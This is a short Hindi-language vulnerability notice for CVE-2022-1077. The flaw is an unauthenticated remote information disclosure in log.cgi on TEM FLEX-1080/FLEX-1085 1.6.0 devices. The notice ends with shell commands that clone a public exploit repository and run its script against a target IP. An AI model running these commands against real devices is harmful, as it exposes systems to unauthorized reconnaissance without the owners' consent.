
TEM FLEX-1080/FLEX-1085 1.6.0 log log.cgi सूचना प्रकटीकरण
TEM FLEX-1080 और FLEX-1085 1.6.0 में एक कमजोरी पाई गई। इसे समस्याग्रस्त घोषित किया गया है। यह कमजोरी Log Handler घटक के log.cgi में है। एक सीधा अनुरोध हार्डवेयर जानकारी के प्रकटीकरण की ओर ले जाता है। हमला दूर से शुरू किया जा सकता है और इसके लिए किसी भी प्रकार के प्रमाणीकरण की आवश्यकता नहीं है।

$ git clone https://github.com/Brosck/CVE-2022-1077.git
$ cd CVE-2022-1077
$ chmod +x cve-2022-1077.py
$ ./cve-2022-1077.py -u http://<IP>